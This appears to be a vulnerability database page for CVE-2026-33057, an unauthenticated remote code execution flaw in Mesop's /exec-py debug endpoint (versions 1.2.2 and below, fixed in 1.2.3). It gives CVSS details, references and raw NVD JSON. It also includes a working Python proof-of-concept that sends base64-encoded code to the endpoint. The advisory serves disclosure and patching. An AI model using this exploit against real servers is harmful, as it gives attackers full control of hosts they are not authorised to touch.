CVE-2026-33057

Description

Mesop is a Python-based UI framework that allows users to build web applications. In versions 1.2.2 and below, an explicit web endpoint inside the ai/ testing module infrastructure directly ingests untrusted Python code strings unconditionally without authentication measures, yielding standard Unrestricted Remote Code Execution. Any individual capable of routing HTTP logic to this server block will gain explicit host-machine command rights. The AI codebase package includes a lightweight debugging Flask server inside ai/sandbox/wsgi_app.py. The /exec-py route accepts base_64 encoded raw string payloads inside the code parameter natively evaluated by a basic POST web request. It saves it rapidly to the operating system logic path and injects it recursively using execute_module(module_path...). This issue has been fixed in version 1.2.3.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mesop-dev:mesop:*:*:*:*:*:*:*:* - VULNERABLE

Mesop <= 1.2.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import base64

def exploit(target_url):
    # Define the malicious Python code to execute
    # This example creates a file named 'pwned.txt' in /tmp
    malicious_code = """
import os
with open('/tmp/pwned.txt', 'w') as f:
    f.write('Vulnerable to CVE-2026-33057')
"""

    # Encode the payload to Base64 as required by the vulnerable endpoint
    encoded_payload = base64.b64encode(malicious_code.encode('utf-8')).decode('utf-8')

    # Prepare the POST request data
    data = {
        "code": encoded_payload
    }

    try:
        print(f"[+] Sending payload to {target_url}/exec-py")
        response = requests.post(f"{target_url}/exec-py", data=data)
        
        if response.status_code == 200:
            print("[+] Payload sent successfully.")
            print(f"[+] Server response: {response.text}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://127.0.0.1:8080"
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33057
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33057
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33057/
[4] VulDB https://vuldb.com/cve/CVE-2026-33057
[5] https://github.com/mesop-dev/mesop/commit/825f55970c20686de3f28e2c66df4d74e9d4db47
[6] https://github.com/mesop-dev/mesop/security/advisories/GHSA-gjgx-rvqr-6w6v

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33057", "sourceIdentifier": "[email protected]", "published": "2026-03-20T08:16:11.763", "lastModified": "2026-03-24T16:04:15.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mesop is a Python-based UI framework that allows users to build web applications. In versions 1.2.2 and below, an explicit web endpoint inside the ai/ testing module infrastructure directly ingests untrusted Python code strings unconditionally without authentication measures, yielding standard Unrestricted Remote Code Execution. Any individual capable of routing HTTP logic to this server block will gain explicit host-machine command rights. The AI codebase package includes a lightweight debugging Flask server inside ai/sandbox/wsgi_app.py. The /exec-py route accepts base_64 encoded raw string payloads inside the code parameter natively evaluated by a basic POST web request. It saves it rapidly to the operating system logic path and injects it recursively using execute_module(module_path...). This issue has been fixed in version 1.2.3."}, {"lang": "es", "value": "Mesop es un framework de UI basado en Python que permite a los usuarios construir aplicaciones web. En las versiones 1.2.2 e inferiores, un endpoint web explícito dentro de la infraestructura del módulo de pruebas ai/ ingiere directamente cadenas de código Python no confiables incondicionalmente sin medidas de autenticación, lo que resulta en una Ejecución Remota de Código sin Restricciones estándar. Cualquier individuo capaz de enrutar lógica HTTP a este bloque de servidor obtendrá derechos explícitos de comando de la máquina anfitriona. El paquete de código base de IA incluye un servidor Flask de depuración ligero dentro de ai/sandbox/wsgi_app.py. La ruta /exec-py acepta cargas útiles de cadenas en bruto codificadas en base_64 dentro del parámetro code, evaluadas nativamente por una solicitud web POST básica. Lo guarda rápidamente en la ruta lógica del sistema operativo y lo inyecta recursivamente usando execute_module(module_path...). Este problema ha sido solucionado en la versión 1.2.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mesop-dev:mesop:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.3", "matchCriteriaId": "D66D038F-24FF-444E-B60F-6EAC62CDBB08"}]}]}], "references": [{"url": "https://github.com/mesop-dev/mesop/commit/825f55970c20686de3f28e2c66df4d74e9d4db47", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-gjgx-rvqr-6w6v", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}